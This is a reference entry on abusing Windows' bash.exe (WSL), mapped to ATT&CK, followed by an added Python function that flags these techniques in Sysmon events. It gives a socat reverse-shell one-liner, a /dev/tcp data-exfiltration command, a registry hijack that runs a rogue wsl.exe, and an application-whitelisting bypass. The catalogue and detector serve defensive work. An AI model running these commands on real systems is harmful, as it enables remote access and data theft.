Bash.exe

Execute (CMD)
AWL bypass (CMD)

File used by Windows Subsystem for Linux

Paths:

Resources:

Acknowledgements:

Detections:

Execute

  1. Executes an executable from bash.exe

    bash.exe -c "{CMD}"
    Use case

    Executes the specified file; can be used for defense evasion.

    Privileges required
    User
    Operating systems
    Windows 10
    ATT&CK® technique
    T1202
    Tags
    Execute: CMD
  2. Executes a reverse shell

    bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
    Use case

    Executes the specified file; can be used for defense evasion.

    Privileges required
    User
    Operating systems
    Windows 10
    ATT&CK® technique
    T1202
    Tags
    Execute: CMD
  3. Exfiltrate data

    bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24'
    Use case

    Executes the specified file; can be used for defense evasion.

    Privileges required
    User
    Operating systems
    Windows 10
    ATT&CK® technique
    T1202
    Tags
    Execute: CMD
  4. When executed, bash.exe queries the registry value of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\MSI\InstallLocation, which contains a folder path (c:\program files\wsl by default). If the value points to another folder containing a file named wsl.exe, it will be executed instead of the legitimate wsl.exe in the program files folder.

    bash.exe
    Use case

    Execute a payload as a child process of bash.exe while masquerading as WSL.

    Privileges required
    User
    Operating systems
    Windows 10, Windows Server 2019, Windows 11
    ATT&CK® technique
    T1218
    Tags
    Execute: CMD

AWL bypass

  1. Executes an executable from bash.exe

    bash.exe -c "{CMD}"
    Use case

    Executes the specified file; can be used to bypass application whitelisting.

    Privileges required
    User
    Operating systems
    Windows 10
    ATT&CK® technique
    T1202
    Tags
    Execute: CMD
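
The indicators in Execute entries 2 to 4 above, expressed as a triage function over process-creation and registry-set events. This is an added example, not part of the original entry: it assumes Sysmon-style records (EventID 1 and 13 with the Image, ParentImage, CommandLine, TargetObject and Details fields) and a default WSL install location, and the names `triage` and `SAMPLE_EVENTS` and all sample events are constructed here.

```python
import ntpath
import re

# Default folder this page gives for the Lxss\MSI\InstallLocation value.
DEFAULT_WSL_DIR = r"c:\program files\wsl"
LXSS_VALUE = r"\software\microsoft\windows\currentversion\lxss\msi\installlocation"
# Network primitives used by this page's bash.exe -c examples.
NET_PATTERN = re.compile(r"/dev/tcp/|\bsocat\b", re.IGNORECASE)

def _norm(path):
    """Lower-case, unquote and normalise a Windows path for comparison."""
    return ntpath.normpath(path.strip().strip('"')).lower()

def triage(event):
    """Return finding names for one Sysmon-style event (dict of field -> value)."""
    findings = []
    if event.get("EventID") == 1:  # process creation
        image = _norm(event.get("Image", ""))
        parent = _norm(event.get("ParentImage", ""))
        cmdline = event.get("CommandLine", "")
        if ntpath.basename(image) == "bash.exe" and re.search(r"\s-c\s", cmdline):
            findings.append("bash_inline_command")
            if NET_PATTERN.search(cmdline):
                findings.append("bash_network_primitive")
        if (ntpath.basename(parent) == "bash.exe"
                and ntpath.basename(image) == "wsl.exe"
                and ntpath.dirname(image) != DEFAULT_WSL_DIR):
            findings.append("wsl_outside_default_dir")
    elif event.get("EventID") == 13:  # registry value set
        if (event.get("TargetObject", "").lower().endswith(LXSS_VALUE)
                and _norm(event.get("Details", "")) != DEFAULT_WSL_DIR):
            findings.append("lxss_installlocation_changed")
    return findings

# Constructed sample events (not captured telemetry); paths and addresses are made up.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\bash.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "bash.exe -c 'cat /mnt/c/tmp/a.zip > /dev/tcp/192.0.2.10/24'"},
    {"EventID": 13, "Details": r"C:\Users\Public\wsl",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\MSI\InstallLocation"},
    {"EventID": 1, "Image": r"C:\Users\Public\wsl\wsl.exe",
     "ParentImage": r"C:\Windows\System32\bash.exe", "CommandLine": "wsl.exe"},
    {"EventID": 1, "Image": r"C:\Program Files\WSL\wsl.exe",
     "ParentImage": r"C:\Windows\System32\bash.exe", "CommandLine": "wsl.exe"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.get("Image") or ev.get("TargetObject"), "->", triage(ev))
```

On hosts where WSL is installed to a non-default folder, set `DEFAULT_WSL_DIR` to that folder before relying on the last two findings.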